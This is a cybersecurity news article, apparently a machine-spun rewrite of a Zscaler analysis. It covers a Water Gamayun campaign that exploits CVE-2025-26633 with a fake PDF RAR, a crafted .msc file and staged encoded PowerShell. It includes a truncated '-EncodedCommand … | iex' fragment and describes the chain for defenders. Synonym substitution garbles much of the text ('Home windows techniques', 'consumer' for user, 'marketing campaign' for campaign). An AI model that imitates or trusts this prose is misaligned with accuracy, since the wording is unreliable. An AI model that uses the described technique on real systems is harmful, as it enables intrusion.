Water Gamayun, a persistent risk group, has lately intensified its efforts by exploiting a newly recognized MSC EvilTwin vulnerability (CVE-2025-26633) in Home windows techniques.
This malware marketing campaign is marked by its use of multi-stage assaults focusing on enterprise and authorities organizations, aiming to steal delicate data, credentials, and preserve long-term entry to networks.
Rising in 2025, these assaults mix subtle techniques—akin to leveraging trusted binaries and deep obfuscation—to bypass trendy safety controls whereas presenting customers with convincing lures, akin to pretend job paperwork.
The assault begins with a consumer’s net search that lands on a compromised web site. The web site silently strikes the sufferer to a lookalike area, delivering a malicious RAR file disguised as a PDF (masqueraded as “hiringassistant.pdf.rar”).
MSC Payload Disguised as PDF (Supply – Zscaler)
When the consumer opens this file, the embedded payload exploits the MSC EvilTwin vulnerability by dropping a crafted .msc file. This file is loaded by mmc.exe, which triggers hidden PowerShell instructions via the abuse of TaskPad snap-in instructions.
As Zscaler safety analysts recognized, the marketing campaign’s distinctive method combines a sequence of password-protected archives, window-hiding code, and staged payload execution to cover its tracks from each customers and automatic detection instruments.
The Zscaler analysis crew attributed this marketing campaign to Water Gamayun resulting from a number of robust markers, together with the uncommon abuse of the EvilTwin vulnerability, customized PowerShell obfuscation, and using decoy paperwork to decrease suspicion.
Their evaluation revealed that, after establishing an preliminary foothold, the malware chain leverages downloadable executables, archive extraction, and course of injection to develop its attain.
Multi-Stage Payload and Hidden Execution
On the core of Water Gamayun’s methodology is a layered an infection course of. After the disguised RAR file is opened, the payload writes an .msc file to disk.
When executed, mmc.exe interprets this file utilizing malicious snap-in information to run encoded PowerShell through TaskPad. The PowerShell script—the primary stage—downloads legit instruments like UnRAR.exe, then accesses password-protected archives containing extra payloads.
These scripts execute instructions akin to:-
-EncodedCommand JABX… | iex
A second-stage script compiles a .NET module to cover malware home windows from view, runs a decoy PDF, and drops the ultimate loader executable, ItunesC.exe. This loader allows long-term persistence by launching a number of cases and hiding community beacons to exterior IPs.
The marketing campaign highlights how superior obfuscation and multi-phase execution can evade detection, making it important for defenders to observe for uncommon file extensions, encoded PowerShell use, suspicious course of chains, and community exercise to related infrastructure.
Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most well-liked Supply in Google.
